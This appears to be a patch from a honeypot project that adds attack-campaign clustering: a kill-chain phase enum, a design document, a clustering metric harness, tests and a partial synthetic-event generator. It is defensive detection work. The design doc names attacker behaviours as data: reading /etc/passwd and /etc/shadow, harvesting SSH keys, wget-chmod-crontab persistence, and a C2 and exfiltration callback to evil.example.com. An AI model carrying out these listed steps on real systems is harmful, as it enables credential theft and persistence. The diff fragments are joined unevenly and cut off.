"""
Unified Kill Chain phase vocabulary (Pols, 2017).

Used as the canonical phase enum for campaign clustering and (eventually)
the MITRE ATT&CK / TTPs-tagging worker. UKC tactic names map cleanly onto
ATT&CK tactics, so emitting these labels in synthetic data and runtime
phase inference avoids a renaming pass when TTP-tagging lands.

A honeypot does not observe the entire chain. Pre-target phases (OSINT
reconnaissance, resource development, weaponization, social engineering)
happen before any decky is touched. The DSL allows the full enum so a
campaign spec can describe an end-to-end story; the synthetic generator
emits no events for unobservable phases.
"""
from __future__ import annotations

from enum import Enum


class UKCPhase(str, Enum):
    """Kill-chain phase labels, grouped by stage (In / Through / Out).

    Members are ``str`` subclasses, so each one compares equal to its
    lowercase snake_case value (``UKCPhase("delivery") is UKCPhase.DELIVERY``).
    """

    # In — initial foothold
    RECONNAISSANCE = "reconnaissance"
    RESOURCE_DEVELOPMENT = "resource_development"
    WEAPONIZATION = "weaponization"
    DELIVERY = "delivery"
    SOCIAL_ENGINEERING = "social_engineering"
    EXPLOITATION = "exploitation"
    PERSISTENCE = "persistence"
    DEFENSE_EVASION = "defense_evasion"
    COMMAND_AND_CONTROL = "command_and_control"
    # Through — network propagation
    PIVOTING = "pivoting"
    DISCOVERY = "discovery"
    PRIVILEGE_ESCALATION = "privilege_escalation"
    EXECUTION = "execution"
    CREDENTIAL_ACCESS = "credential_access"
    LATERAL_MOVEMENT = "lateral_movement"
    # Out — action on objectives
    COLLECTION = "collection"
    EXFILTRATION = "exfiltration"
    IMPACT = "impact"
    OBJECTIVES = "objectives"


# Phases a honeypot can plausibly observe. Pre-target phases are excluded:
# OSINT recon, infrastructure-stand-up, payload authoring, and human-target
# manipulation all happen before the attacker touches a decky. The synthetic
# generator validates campaign specs against this set and warns (but does
# not error) on unobservable phases — a campaign can describe them; we just
# emit no events.
OBSERVABLE_PHASES: frozenset[UKCPhase] = frozenset({
    UKCPhase.DELIVERY,
    UKCPhase.EXPLOITATION,
    UKCPhase.PERSISTENCE,
    UKCPhase.DEFENSE_EVASION,
    UKCPhase.COMMAND_AND_CONTROL,
    UKCPhase.PIVOTING,
    UKCPhase.DISCOVERY,
    UKCPhase.PRIVILEGE_ESCALATION,
    UKCPhase.EXECUTION,
    UKCPhase.CREDENTIAL_ACCESS,
    UKCPhase.LATERAL_MOVEMENT,
    UKCPhase.COLLECTION,
    UKCPhase.EXFILTRATION,
    UKCPhase.IMPACT,
    UKCPhase.OBJECTIVES,
})


# Stage groupings — useful for the multi_operator fixture (operators tend
# to split along the In / Through / Out boundary) and for downstream
# UI rendering of campaign timelines.
STAGE_IN: frozenset[UKCPhase] = frozenset({
    UKCPhase.RECONNAISSANCE,
    UKCPhase.RESOURCE_DEVELOPMENT,
    UKCPhase.WEAPONIZATION,
    UKCPhase.DELIVERY,
    UKCPhase.SOCIAL_ENGINEERING,
    UKCPhase.EXPLOITATION,
    UKCPhase.PERSISTENCE,
    UKCPhase.DEFENSE_EVASION,
    UKCPhase.COMMAND_AND_CONTROL,
})

STAGE_THROUGH: frozenset[UKCPhase] = frozenset({
    UKCPhase.PIVOTING,
    UKCPhase.DISCOVERY,
    UKCPhase.PRIVILEGE_ESCALATION,
    UKCPhase.EXECUTION,
    UKCPhase.CREDENTIAL_ACCESS,
    UKCPhase.LATERAL_MOVEMENT,
})

STAGE_OUT: frozenset[UKCPhase] = frozenset({
    UKCPhase.COLLECTION,
    UKCPhase.EXFILTRATION,
    UKCPhase.IMPACT,
    UKCPhase.OBJECTIVES,
})


def stage_of(phase: UKCPhase) -> str:
    """Return 'in' | 'through' | 'out' for a given phase.

    Raises:
        ValueError: if ``phase`` belongs to none of the three stage sets.
            Without this check an unrecognised value (or a newly added
            enum member that was never assigned to a stage) would be
            silently reported as 'out'.
    """
    if phase in STAGE_IN:
        return "in"
    if phase in STAGE_THROUGH:
        return "through"
    if phase in STAGE_OUT:
        return "out"
    raise ValueError(f"unknown UKC phase: {phase!r}")
b/development/CAMPAIGN_CLUSTERING.md @@ -0,0 +1,223 @@ +# Campaign Clustering — Design + +**Status:** pre-implementation. This doc is the spec; code follows. + +**Roadmap entry:** `DEVELOPMENT.md` — Detection & Intelligence → "Attack campaign clustering". + +## Premise + +A *campaign* is a coordinated set of attacker actions that share intent, tooling, or operator — observable at DECNET as recurring patterns across `attackers`, `sessions`, `fingerprints`, `credentials`, and `payloads`. + +We will not write clustering code until we can **simulate campaigns with ground-truth labels** and run a clusterer against those labels. The simulator is the specification for what a campaign is; the algorithm is replaceable. + +Order of work, strictly: + +1. Campaign DSL + generator (produces synthetic events with `campaign_id` / `actor_id` labels). +2. Adversarial scenario fixtures (the 6 below). +3. Metric harness (ARI + homogeneity + completeness + singleton recall). +4. Dumbest viable clusterer (connected components on a similarity graph). Must pass all 6 fixtures. +5. Pipeline integration (`decnet clusterer` worker, `campaigns` table, dashboard). +6. Replay tier — public datasets / Honeynet SSH logs through the live collector. Reality check, not optional forever. + +Steps 1–3 are the durable artifact. Step 4 is the first throwaway algorithm. + +--- + +## Phase Vocabulary: Unified Kill Chain + +Phase names use the **Unified Kill Chain** (Pols, 2017); the enum in `decnet/clustering/ukc.py` carries 19 phases across 3 stages (tabulated below). UKC maps cleanly to MITRE ATT&CK tactics, which means the phase labels we emit in synthetic data are the same labels the future TTP-tagging worker (also in `DEVELOPMENT.md`) will produce. Fixtures become reusable across both features instead of needing renaming. 
+ +| Stage | Phases | +|---|---| +| **In** (initial foothold) | Reconnaissance, Resource Development, Weaponization, Delivery, Social Engineering, Exploitation, Persistence, Defense Evasion, Command & Control | +| **Through** (network propagation) | Pivoting, Discovery, Privilege Escalation, Execution, Credential Access, Lateral Movement | +| **Out** (action on objectives) | Collection, Exfiltration, Impact, Objectives | + +**Honeypot observability.** A honeypot does not see the entire chain. Pre-target phases (OSINT Reconnaissance, Resource Development, Weaponization, Social Engineering) happen before any decky is touched. We observe 15 of the 19 phases listed above: + +- **In:** Delivery, Exploitation, Persistence, Defense Evasion, Command & Control +- **Through:** Pivoting, Discovery, Privilege Escalation, Execution, Credential Access, Lateral Movement +- **Out:** Collection, Exfiltration, Impact, Objectives + +The DSL allows the full enum so a campaign spec can describe an end-to-end story, but the generator emits no events for unobservable phases (and warns on them). MazeNET makes Pivoting and Lateral Movement first-class — that's where DECNET has *more* signal than a single-host honeypot, not less. + +Each phase carries default tool-signature templates the DSL can override per-campaign. Examples: + +- `discovery` → defaults: `whoami`, `id`, `uname -a`, `netstat -tnp`, `cat /etc/passwd` +- `persistence` → defaults: crontab edit, `~/.ssh/authorized_keys` write, systemd unit drop, `.bashrc` append +- `credential_access` → defaults: `/etc/shadow` read, browser-cred files, SSH key harvest +- `lateral_movement` → defaults: SSH/WinRM/SMB pivot to another decky in the same MazeNET segment + +--- + +## 1. Campaign DSL + +A campaign is a *causal story*, not a bag of events. Generator consumes YAML, emits a stream of synthetic records into the test DB with ground-truth labels. 
+ +```yaml +campaign: + id: c-apt-fauxbear-01 + actors: + - id: a-001 + asn: 14061 # DigitalOcean + ip_pool: rotating # rotating | sticky | tor + ja3: 769,4865-... # tool fingerprint, shared within campaign + hassh: aae6b9... + hours_active_utc: [22, 23, 0, 1, 2, 3] + jitter_seconds: 90 + role: intrusion # intrusion | post-exploit | exfil — for multi-operator campaigns + - id: a-002 + asn: 14061 + ip_pool: sticky + ja3: 769,4865-... # same tool, different operator + hassh: aae6b9... + hours_active_utc: [14, 15, 16, 17] + jitter_seconds: 30 + role: post-exploit + phases: # UKC phase enum + - name: delivery + actor: a-001 + tool_signature: { user_agent: "Mozilla/5.0 (compatible; Nmap)" } + target_selector: { service: any, count: 50 } + dwell_seconds: 1 + - name: exploitation + actor: a-001 + tool_signature: { payload_hash: deadbeef..., cve: CVE-2024-XXXX } + target_selector: { service: http, port: 8080 } + success_rate: 0.2 + - name: persistence + actor: a-001 + tool_signature: { commands: ["wget", "chmod +x", "./", "crontab -e"] } + target_selector: { decky: previous_success } + - name: command_and_control + actor: a-001 + tool_signature: { c2_callback: evil.example.com, beacon_jitter_seconds: 30 } + - name: discovery + actor: a-002 # handoff to second operator + tool_signature: { commands: ["whoami", "id", "uname -a", "ip route", "arp -a"] } + - name: lateral_movement + actor: a-002 + tool_signature: { protocol: ssh, credential_source: harvested } + target_selector: { decky: adjacent_in_mazenet } + - name: collection + actor: a-002 + tool_signature: { paths: ["/var/lib/mysql/*", "/home/*/Documents/*"] } + - name: exfiltration + actor: a-002 + tool_signature: { c2_callback: evil.example.com, payload_hash: deadbeef... } + duration_days: 7 + pause_windows: [] # for the "campaign that pauses" scenario +``` + +**Generator contract:** + +- Input: list of campaign YAMLs + `noise: { scanner_count, ratio }`. 
+- Output: rows in `attackers` / `sessions` / `fingerprints` / `credentials_attempts` / `payloads`, each tagged with a `_truth_campaign_id` and `_truth_actor_id` column (test-only, stripped before clustering runs). +- Deterministic given a seed. +- Validates phase names against the UKC enum; warns on unobservable phases (emits no events for them). + +The generator lives at `tests/factories/campaign_factory.py`. The DSL parser is the spec; if a real attacker pattern can't be expressed in it, the DSL is incomplete and we extend it before extending the clusterer. + +--- + +## 2. Adversarial Scenario Fixtures + +Six fixtures. Each is a YAML file under `tests/fixtures/campaigns/` plus an expected-bounds file. CI runs the clusterer against all six; any regression fails the build. + +| # | Name | Setup | Pass condition | +|---|---|---|---| +| 1 | `shared_wordlist` | 2 distinct campaigns, both use rockyou-top1k for SSH brute (Credential Access phase) | Must NOT merge — credential overlap alone is insufficient signal | +| 2 | `vpn_hopping` | 1 campaign, 1 actor, IPs rotate across 5 ASNs over 3 days, JA3/HASSH stable, full Delivery→C2→Discovery chain | Must NOT split — actor identity survives IP churn | +| 3 | `lone_wolf` | 1 opportunistic scanner, Delivery phase only, no follow-up, no shared signals | Must stay singleton — not absorbed into any campaign | +| 4 | `paused_campaign` | 1 campaign, active days 1–2 (Delivery, Exploitation), silent days 3–5, active days 6–7 (Discovery, Lateral Movement, Exfiltration) | Must NOT split into two campaigns — temporal window must accommodate operator pauses | +| 5 | `multi_operator` | 1 campaign, 2 actors with distinct UKC roles: actor A handles Delivery→Exploitation→Persistence→C2 on UTC night shift, actor B handles Discovery→Lateral Movement→Collection→Exfiltration on UTC day shift, different IPs/ASNs, shared C2 callback + payload hash | Must merge — shared tooling and phase handoff > diverged infra | +| 6 | `noise_floor` | All 5 
above + 10× random Delivery-only scanners drawn from a noise distribution | All 5 must still resolve correctly; scanners stay singleton | + +Fixture 5 is the load-bearing one for UKC: a real campaign frequently splits operators along the In/Through/Out boundary, and a clusterer that only looks at IP/ASN will miss it. Phase-handoff is itself a feature the algorithm can use. + +**Bounds per fixture** (in `expected.yaml` next to each): + +```yaml +adjusted_rand_index: { min: 0.85 } +homogeneity: { min: 0.90 } # no false merges +completeness: { min: 0.80 } # no false splits +singleton_recall: { min: 0.95 } # for lone_wolf / noise scanners +``` + +Bounds are deliberately loose at first — we ratchet them up as the algorithm improves. Loosening a bound to make CI pass requires a PR comment justifying it. + +--- + +## 3. Metric Harness + +`tests/clustering/metrics.py`. Decided **before** any algorithm exists, so we don't pick the metric that flatters the result. + +- **Adjusted Rand Index** — headline. Compares predicted vs. truth labels, corrects for chance. +- **Homogeneity** — each predicted cluster contains only members of one true campaign. Catches false merges. +- **Completeness** — all members of a true campaign land in the same predicted cluster. Catches false splits. +- **Singleton recall** — fraction of true singletons (lone wolves, noise) that stay singleton. + +Homogeneity and completeness trade off; both must be reported. A single number hides which direction the algorithm is failing. + +**Per-fixture report** is dumped as JSON on every CI run, not just pass/fail, so we can watch trends over time. + +--- + +## 4. First Algorithm (after 1–3 are green) + +Connected-components on a similarity graph. No ML. + +- Nodes: attackers (or sessions, TBD — see open questions). +- Edges: weighted similarity, threshold to binarize. 
+- Edge weight = sum of: + - JA3/JA4/HASSH exact match: high + - Payload hash exact match: high + - C2 callback domain/IP exact match: high + - **Phase-handoff signal:** actor X ends in C2/Persistence on a decky, actor Y begins Discovery/Lateral Movement on the same decky within window W: medium-high. Defeats fixture 5 even when IP/ASN diverge. + - Credential-list Jaccard: low (defeated by fixture 1) + - Command-sequence Jaccard, bucketed by UKC phase: medium + - Temporal proximity (within window W): low multiplier + - ASN match: very low +- Edge threshold and feature weights are config, tuned against the 6 fixtures. + +If connected-components passes all 6, ship it. DBSCAN/HDBSCAN/graph-community algorithms are deferred until a fixture proves CC inadequate. + +--- + +## 5. Pipeline Integration + +- New worker: `decnet clusterer`. Bus consumer on `attacker.scored` and `attacker.observed`. +- Re-cluster strategy: incremental on new attacker arrivals, full re-cluster nightly. +- Storage: `campaigns` table (UUID PK, per the `feedback_uuid_over_natural_keys` rule); `attackers.campaign_id` FK nullable. +- Bus signal: `campaign.{id}.formed` / `campaign.{id}.updated`. Document in `wiki-checkout/Service-Bus.md` per the `feedback_wiki_bus_signals` rule. +- Dashboard: Campaigns list page + CampaignDetail (aggregated AttackerDetail, with a UKC phase timeline visualization showing which phases each actor in the campaign executed). + +--- + +## 6. Replay Tier (post-v1) + +Public-dataset replay through the real collector. Confirms our fixtures encode realistic patterns, not just our assumptions. + +Candidate sources: +- Honeynet Project SSH session corpora. +- DShield daily summaries. +- Our own production data once it accumulates. + +This is where we discover whether the DSL is missing a dimension. Schedule it; don't punt forever. + +--- + +## Risks + +1. **Simulator encodes our assumptions.** Real attackers may not match. Mitigation: replay tier (§6). +2. 
**Bound creep.** Loosening fixture bounds to ship is the failure mode. Mitigation: bound changes require PR justification. +3. **Feature drift.** Sniffer fingerprint coverage changes the available signal. Mitigation: feature set is configurable; fixtures regenerate from the DSL when features change. +4. **UKC phase inference accuracy.** The clusterer relies on phase labels per session — those have to come from somewhere. Pre-TTP-tagging worker, the DSL emits them as ground truth in synthetic data, and the live pipeline uses heuristic phase assignment (command keywords, port/protocol). This is a known approximation; tightens once the TTP-tagging worker ships. +5. **Cost of full re-cluster.** At fleet scale, nightly re-cluster on millions of attackers is expensive. Mitigation: incremental-first, full nightly is a fallback we may drop. + +## Open questions + +- **Cluster nodes: attackers or sessions?** Leaning attackers (already deduped by `attacker_uuid`), but session-level may catch campaigns that span multiple attacker identities. Decide after fixture 5 (`multi_operator`). +- **Time window W** for temporal-proximity and phase-handoff edges: 24h? 7d? Tuned against fixture 4 (`paused_campaign`). +- **Phase inference at runtime.** Do we ship a heuristic phase classifier alongside the clusterer, or block on the TTP-tagging worker landing first? Heuristic is faster but is technical debt against the future ATT&CK-tagged version. +- **API exposure.** Do we expose campaigns in the public API or admin-only at first? Admin-only until we have UI for false-positive correction. diff --git a/development/DEVELOPMENT_V2.md b/development/DEVELOPMENT_V2.md index 58b1638e..dfaafabe 100644 --- a/development/DEVELOPMENT_V2.md +++ b/development/DEVELOPMENT_V2.md @@ -546,6 +546,12 @@ push-only covers it. --- +## Campaign Clustering — DSL Evolution + +The DSL currently models campaigns as linear phase sequences with clear actor assignments. 
"""
Clustering metric harness — see development/CAMPAIGN_CLUSTERING.md §3.

Decided BEFORE any clustering algorithm exists, on purpose: if the
metrics get picked after seeing results, they'll flatter whatever the
algorithm happens to produce.

Four metrics, none on its own sufficient:

  * Adjusted Rand Index — headline number, chance-corrected agreement
    between predicted clusters and ground truth.
  * Homogeneity — each predicted cluster contains only one true class.
    Catches FALSE MERGES (campaigns wrongly fused).
  * Completeness — every member of a true class lands in the same
    predicted cluster. Catches FALSE SPLITS (one campaign wrongly torn
    apart).
  * Singleton recall — fraction of ground-truth singletons (lone wolves,
    background noise) that are kept singleton by the clusterer.

Every metric takes two ``item_id -> label`` mappings and requires them to
cover exactly the same items; a mismatch raises ``ValueError``.

Implemented from first principles in pure Python so the test harness
doesn't pull sklearn/numpy into the runtime dependency surface.
"""
from __future__ import annotations

import math
from collections import Counter, defaultdict


def _comb2(n: int) -> int:
    """C(n, 2) — number of unordered pairs from n items."""
    return n * (n - 1) // 2 if n >= 2 else 0


def _require_aligned(
    metric: str, truth: dict[str, str], pred: dict[str, str]
) -> None:
    """Raise ValueError unless truth and pred label exactly the same items.

    Shared by all four metrics so a misaligned call fails the same way
    everywhere, instead of surfacing as a KeyError (item missing from
    pred) or as a silently skewed score (extra items in pred).
    """
    if set(truth) != set(pred):
        raise ValueError(
            f"{metric} requires identical item sets in truth and pred "
            f"(missing in pred: {set(truth) - set(pred)}, "
            f"missing in truth: {set(pred) - set(truth)})"
        )


def adjusted_rand_index(truth: dict[str, str], pred: dict[str, str]) -> float:
    """
    Adjusted Rand Index between two clusterings over the same item set.

    Range: typically [0, 1]; can dip negative for worse-than-random
    labelings. 1.0 = identical partitions (up to label renaming),
    0.0 ≈ chance agreement.

    Both args map item_id -> cluster_id. Items must align exactly;
    raises ValueError otherwise.
    """
    _require_aligned("ARI", truth, pred)
    n = len(truth)
    if n < 2:
        return 1.0  # trivially "agree" on <2 items

    # Build the contingency table n_ij = |cluster_i ∩ class_j|.
    contingency: dict[tuple[str, str], int] = defaultdict(int)
    for item, t_label in truth.items():
        p_label = pred[item]
        contingency[(p_label, t_label)] += 1

    sum_comb = sum(_comb2(v) for v in contingency.values())
    a_counts = Counter(pred.values())   # row sums (predicted clusters)
    b_counts = Counter(truth.values())  # column sums (true classes)
    sum_a = sum(_comb2(v) for v in a_counts.values())
    sum_b = sum(_comb2(v) for v in b_counts.values())
    total_pairs = _comb2(n)

    expected = (sum_a * sum_b) / total_pairs if total_pairs else 0.0
    max_index = (sum_a + sum_b) / 2
    if max_index == expected:
        # Degenerate: both clusterings are trivially equal in structure
        # (both all-singletons, or both one-big-cluster). The math forces
        # this — see the algebra of max_index = expected. The induced
        # partitions are necessarily identical, so ARI is 1.0. (sklearn
        # adopts the same convention.)
        return 1.0
    return (sum_comb - expected) / (max_index - expected)


def _entropy(counts: list[int], total: int) -> float:
    """Shannon entropy (natural log) of a count vector summing to total."""
    if total == 0:
        return 0.0
    h = 0.0
    for c in counts:
        if c == 0:
            continue
        p = c / total
        h -= p * math.log(p)
    return h


def _conditional_entropy(
    contingency: dict[tuple[str, str], int],
    given_counts: dict[str, int],
    total: int,
) -> float:
    """H(rows | cols) — i.e. entropy of class within each cluster.

    ``contingency`` is keyed ``(row, col)``; ``given_counts`` holds the
    column totals. Each column's entropy is weighted by its share of
    ``total``.
    """
    if total == 0:
        return 0.0
    h = 0.0
    by_col: dict[str, list[int]] = defaultdict(list)
    for (_row, col), v in contingency.items():
        by_col[col].append(v)
    for col, vs in by_col.items():
        col_total = given_counts[col]
        if col_total == 0:
            continue
        col_entropy = _entropy(vs, col_total)
        h += (col_total / total) * col_entropy
    return h


def homogeneity(truth: dict[str, str], pred: dict[str, str]) -> float:
    """
    1 - H(truth | pred) / H(truth). 1.0 = each predicted cluster
    contains only members of a single true class (no false merges).

    Raises ValueError if truth and pred do not cover the same items.
    """
    _require_aligned("homogeneity", truth, pred)
    n = len(truth)
    if n == 0:
        return 1.0
    contingency: dict[tuple[str, str], int] = defaultdict(int)
    for item, t in truth.items():
        contingency[(t, pred[item])] += 1
    truth_counts = Counter(truth.values())
    pred_counts = Counter(pred.values())
    h_truth = _entropy(list(truth_counts.values()), n)
    if h_truth == 0:
        # A single true class cannot be "mixed" by any clustering.
        return 1.0
    h_truth_given_pred = _conditional_entropy(contingency, dict(pred_counts), n)
    return 1.0 - (h_truth_given_pred / h_truth)


def completeness(truth: dict[str, str], pred: dict[str, str]) -> float:
    """
    1 - H(pred | truth) / H(pred). 1.0 = all members of each true class
    are assigned to the same predicted cluster (no false splits).

    Raises ValueError if truth and pred do not cover the same items.
    """
    _require_aligned("completeness", truth, pred)
    n = len(truth)
    if n == 0:
        return 1.0
    contingency: dict[tuple[str, str], int] = defaultdict(int)
    for item, t in truth.items():
        contingency[(pred[item], t)] += 1
    pred_counts = Counter(pred.values())
    truth_counts = Counter(truth.values())
    h_pred = _entropy(list(pred_counts.values()), n)
    if h_pred == 0:
        # One predicted cluster holds everything: nothing was split.
        return 1.0
    h_pred_given_truth = _conditional_entropy(contingency, dict(truth_counts), n)
    return 1.0 - (h_pred_given_truth / h_pred)


def singleton_recall(truth: dict[str, str], pred: dict[str, str]) -> float:
    """
    Fraction of ground-truth singletons that the clusterer kept singleton.

    A "true singleton" is an item whose truth-campaign has exactly one
    member (lone wolves, background noise scanners). The metric exists
    because ARI/homogeneity/completeness all dilute the cost of a
    clusterer that absorbs noise into real campaigns — and noise
    absorption is the failure mode that makes campaign attribution
    useless in practice.

    Returns 1.0 when there are no true singletons. Raises ValueError if
    truth and pred do not cover the same items.
    """
    _require_aligned("singleton_recall", truth, pred)
    truth_counts = Counter(truth.values())
    true_singletons = [item for item, t in truth.items() if truth_counts[t] == 1]
    if not true_singletons:
        return 1.0
    pred_counts = Counter(pred.values())
    kept = sum(1 for item in true_singletons if pred_counts[pred[item]] == 1)
    return kept / len(true_singletons)


def score(truth: dict[str, str], pred: dict[str, str]) -> dict[str, float]:
    """One-shot bundle the four metrics for fixture reports."""
    return {
        "adjusted_rand_index": adjusted_rand_index(truth, pred),
        "homogeneity": homogeneity(truth, pred),
        "completeness": completeness(truth, pred),
        "singleton_recall": singleton_recall(truth, pred),
    }
+import pytest + +from decnet.clustering.ukc import UKCPhase +from tests.factories.campaign_factory import ( + DSLValidationError, + generate, +) + + +def _minimal_spec() -> dict: + return { + "campaign": { + "id": "c-test", + "actors": [{"id": "a-1", "asn": 64512}], + "phases": [{"name": "delivery", "actor": "a-1"}], + "duration_days": 1, + } + } + + +def test_generation_is_deterministic_given_seed() -> None: + spec = _minimal_spec() + a = generate(spec, seed=42) + b = generate(spec, seed=42) + # IDs are RNG-driven — same seed must produce identical IDs, not + # merely identical structure. Otherwise federation gossip and + # fixture diffing both break. + assert [att.attacker_id for att in a.attackers] == [ + att.attacker_id for att in b.attackers + ] + assert [s.session_id for s in a.sessions] == [s.session_id for s in b.sessions] + + +def test_different_seeds_produce_different_ids() -> None: + spec = _minimal_spec() + a = generate(spec, seed=1) + b = generate(spec, seed=2) + assert a.attackers[0].attacker_id != b.attackers[0].attacker_id + + +def test_truth_labels_match_dsl() -> None: + spec = _minimal_spec() + corpus = generate(spec, seed=0) + assert corpus.attackers[0].truth_campaign_id == "c-test" + assert corpus.attackers[0].truth_actor_id == "a-1" + # truth_labels() returns the dict the metric harness consumes. + labels = corpus.truth_labels() + assert labels[corpus.attackers[0].attacker_id] == "c-test" + + +def test_unobservable_phase_emits_no_events() -> None: + spec = _minimal_spec() + spec["campaign"]["phases"] = [ + {"name": "reconnaissance", "actor": "a-1"}, # pre-target, unobservable + {"name": "delivery", "actor": "a-1"}, + ] + corpus = generate(spec, seed=0) + # Only the delivery phase should produce sessions. 
+ assert all(s.phase == UKCPhase.DELIVERY for s in corpus.sessions) + assert len(corpus.sessions) == 1 + + +def test_unknown_phase_name_raises() -> None: + spec = _minimal_spec() + spec["campaign"]["phases"] = [{"name": "make_coffee", "actor": "a-1"}] + with pytest.raises(DSLValidationError, match="unknown UKC phase"): + generate(spec, seed=0) + + +def test_phase_referencing_unknown_actor_raises() -> None: + spec = _minimal_spec() + spec["campaign"]["phases"] = [{"name": "delivery", "actor": "ghost"}] + with pytest.raises(DSLValidationError, match="unknown actor"): + generate(spec, seed=0) + + +def test_noise_scanners_are_truth_singletons() -> None: + spec = { + "corpus": { + "campaigns": [_minimal_spec()], + "noise": {"scanner_count": 5}, + } + } + corpus = generate(spec, seed=0) + # 1 campaign actor + 5 noise scanners = 6 distinct truth campaigns. + truth_campaigns = {a.truth_campaign_id for a in corpus.attackers} + assert len(truth_campaigns) == 6 + + +def test_multi_actor_campaign_shares_campaign_id() -> None: + spec = { + "campaign": { + "id": "c-shared", + "actors": [ + {"id": "a-1", "asn": 14061}, + {"id": "a-2", "asn": 14061}, + ], + "phases": [ + {"name": "delivery", "actor": "a-1"}, + {"name": "discovery", "actor": "a-2"}, + ], + "duration_days": 1, + } + } + corpus = generate(spec, seed=0) + truth = corpus.truth_labels() + # Both attacker rows must point to the SAME truth_campaign_id — + # this is the property fixture 5 (multi_operator) hinges on. + assert set(truth.values()) == {"c-shared"} diff --git a/tests/clustering/test_lone_wolf_fixture.py b/tests/clustering/test_lone_wolf_fixture.py new file mode 100644 index 00000000..b2126a23 --- /dev/null +++ b/tests/clustering/test_lone_wolf_fixture.py @@ -0,0 +1,92 @@ +""" +End-to-end pipeline test for fixture 3 (lone_wolf). + +Loads the YAML spec, runs the synthetic generator, applies a placeholder +identity clusterer (each attacker → its own cluster), scores against +the expected bounds. 
This is the simplest of the six fixtures and is +deliberately the first one wired up — its ground truth is all +singletons, so an identity clusterer trivially passes, which proves the +DSL→factory→metrics pipeline works before any real algorithm is built. + +Once the connected-components clusterer (CAMPAIGN_CLUSTERING.md §4) +lands, this test will swap the placeholder for the real implementation +and the same fixture must continue to pass. +""" +from __future__ import annotations + +from pathlib import Path + +import pytest +import yaml + +from tests.clustering.metrics import score +from tests.factories.campaign_factory import GeneratedCorpus, generate, load_yaml + +FIXTURE_DIR = Path(__file__).parent.parent / "fixtures" / "campaigns" + + +def _identity_clusterer(corpus: GeneratedCorpus) -> dict[str, str]: + """Every attacker is its own cluster. Trivially correct on lone_wolf.""" + return {a.attacker_id: f"cluster-{a.attacker_id}" for a in corpus.attackers} + + +def test_lone_wolf_pipeline_passes_bounds() -> None: + spec = load_yaml(FIXTURE_DIR / "lone_wolf.yaml") + bounds = yaml.safe_load((FIXTURE_DIR / "lone_wolf.expected.yaml").read_text()) + + corpus = generate(spec, seed=0) + truth = corpus.truth_labels() + pred = _identity_clusterer(corpus) + metrics = score(truth, pred) + + failures = [] + for name, bound in bounds.items(): + observed = metrics[name] + if observed < bound["min"]: + failures.append(f"{name}={observed:.3f} < min {bound['min']:.3f}") + assert not failures, "fixture bounds violated: " + "; ".join(failures) + + +def test_lone_wolf_corpus_shape() -> None: + """Sanity: 1 wolf + 8 noise scanners = 9 attackers, 9 sessions.""" + spec = load_yaml(FIXTURE_DIR / "lone_wolf.yaml") + corpus = generate(spec, seed=0) + assert len(corpus.attackers) == 9 + assert len(corpus.sessions) == 9 + # Every attacker is a truth-singleton (its own campaign). 
+ truth_campaigns = {a.truth_campaign_id for a in corpus.attackers} + assert len(truth_campaigns) == 9 + + +def test_identity_clusterer_fails_on_a_real_campaign() -> None: + """ + Sanity for the harness, NOT a test of the clusterer: a real + multi-actor campaign should make the placeholder identity clusterer + fail completeness, since each truth-campaign gets fragmented into + one-member clusters. If this didn't fail, our metrics would be + blind to false splits — and that's the entire point of fixture 4 + and 5 in the design doc. + """ + spec = { + "campaign": { + "id": "c-real", + "actors": [ + {"id": "a-1", "asn": 14061}, + {"id": "a-2", "asn": 14061}, + ], + "phases": [ + {"name": "delivery", "actor": "a-1"}, + {"name": "discovery", "actor": "a-2"}, + ], + "duration_days": 1, + } + } + corpus = generate(spec, seed=0) + truth = corpus.truth_labels() + pred = _identity_clusterer(corpus) + metrics = score(truth, pred) + # Identity clusterer splits the one true campaign across 2 clusters + # → completeness drops below 1.0. This must hold or our metrics + # aren't catching what they're supposed to catch. + assert metrics["completeness"] < 1.0 + assert metrics["homogeneity"] == pytest.approx(1.0) # no false merges, just splits diff --git a/tests/clustering/test_metrics.py b/tests/clustering/test_metrics.py new file mode 100644 index 00000000..385d2de8 --- /dev/null +++ b/tests/clustering/test_metrics.py @@ -0,0 +1,76 @@ +"""Sanity tests for the clustering metric harness.""" +from __future__ import annotations + +import pytest + +from tests.clustering.metrics import ( + adjusted_rand_index, + completeness, + homogeneity, + score, + singleton_recall, +) + + +def test_perfect_agreement_scores_one() -> None: + truth = {"a": "C1", "b": "C1", "c": "C2", "d": "C2"} + # Same partition, different label names — clustering doesn't preserve + # names, so renamed-but-isomorphic must still score 1.0. 
def test_singleton_recall_penalises_noise_absorption() -> None:
    """singleton_recall is 0 when lone wolves are absorbed and 1 when they stay apart."""
    # Ground truth: three one-member campaigns (the wolves) plus one
    # campaign with two members.
    truth = {"w1": "wolf1", "w2": "wolf2", "w3": "wolf3", "c1": "C", "c2": "C"}

    # Worst case: a single giant cluster swallows every item.
    everything_merged = {item: "BIG" for item in truth}
    assert singleton_recall(truth, everything_merged) == pytest.approx(0.0)

    # Each wolf keeps its own cluster; the campaign members stay together.
    wolves_kept_apart = {"w1": "1", "w2": "2", "w3": "3", "c1": "C", "c2": "C"}
    assert singleton_recall(truth, wolves_kept_apart) == pytest.approx(1.0)
ground truth should be near 0, + # not near 1 — this is the chance-correction guarantee. + truth = {f"i{n}": f"C{n // 4}" for n in range(20)} + # Pred that ignores truth: just shuffles items into 5 buckets in + # an order uncorrelated with truth. + pred = {f"i{n}": f"X{(n * 7) % 5}" for n in range(20)} + ari = adjusted_rand_index(truth, pred) + # Loose bound — the point is "much closer to 0 than to 1". + assert ari < 0.3 diff --git a/tests/factories/__init__.py b/tests/factories/__init__.py new file mode 100644 index 00000000..e69de29b diff --git a/tests/factories/campaign_factory.py b/tests/factories/campaign_factory.py new file mode 100644 index 00000000..6e6f4e51 --- /dev/null +++ b/tests/factories/campaign_factory.py @@ -0,0 +1,381 @@ +""" +Synthetic campaign generator — see development/CAMPAIGN_CLUSTERING.md. + +Reads a YAML campaign DSL describing actors, UKC phases, and tool +signatures, and emits truth-labeled SyntheticAttacker / SyntheticSession +records for the clustering test harness. + +Truth labels (`truth_campaign_id`, `truth_actor_id`) are part of the +emitted records so the metric harness can score predicted clusters +against ground truth without re-parsing the DSL. Production code that +later writes the same shape into real DB tables MUST strip these fields +before clustering runs — otherwise the algorithm trivially passes by +reading the answer key. + +Determinism: given the same YAML and seed, two runs produce identical +records (including IDs). This is a load-bearing property — fixture +expectations are checked against the same seed every CI run. 
@dataclass
class GeneratedCorpus:
    """Everything the factory produced; this is the clusterer's input."""
    # One record per attacker, in emission order.
    attackers: list[SyntheticAttacker]
    # Flat view of every session across all attackers.
